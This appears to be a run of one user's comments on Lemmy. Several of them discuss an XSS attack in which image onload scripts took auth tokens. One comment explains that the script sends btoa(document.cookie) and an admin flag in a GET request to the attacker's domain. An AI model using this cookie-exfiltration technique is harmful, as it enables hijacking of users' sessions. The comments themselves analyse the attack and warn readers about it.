The one reserved for residential usage is home.arpa
.
Oops indeed. Lemmy needs a security audit 😬
Looks like lemmy.blahaj.zone is back
Realizing this blew my mind. Definitely more interesting than following people.
I’d wager you’re likely fine if you’re using a mobile app when the affected image loads. Also, it appears they’re stealing auth tokens… not passwords or anything. At worst they could impersonate you until your token expires… but you’re not a high value target unless you’re an admin of an instance.
What kind of terrible markdown editor allows adding onload scripts to images though… it’s insane.
If it’s onload
then simply viewing the image runs that script. Yikes.
I think that’s right on the money.
The sophistication is impressive, using emojis. Are people getting paid to find the vulnerabilities or are they just bored??
Curl didn’t return anything. They’re likely just using it to log requests since the request path contains the data they need.
I’d be willing to bet they’re using the API to make all the changes. The cookie has the jwt token. I don’t believe you need the username (at least judging by the js API docs).
Looks like it’s issuing a GET to https://zelensky.zip/save/{ENCODED_JWT_TOKEN_AND_NAV_FLAG}
.
The ENCODED_JWT_TOKEN
is from btoa(document.cookie+nav_flag)
where nav_flag
is essentially 'navAdmin'
if the account hit is an admin or ''
if the user hit is not an admin (it checks if the admin button in the nav exists). Their server is likely logging all incoming requests and they just need to do a quick decoding to get jwt tokens and a flag telling them if it’s an admin account.
I’d be hesitant to visit Lemmy on a browser atm 😓
Extra content in exchange for an upvote 🤔
Yep, Lemmy is filling a Reddit-shaped hole. It’s a bit different but nice.
Try searching for https://lemdro.id/c/askandroid from vlemmy. You might be the first subscriber on that instance.
Connect is ridiculously stable and feature-complete for how new it is. Definitely deserves to be mentioned.
That’s awesome, glad you were able to find a solution!
r/latinopeopletwitter
Looks like the instance is on the latest RC which includes the fix for the vulnerability.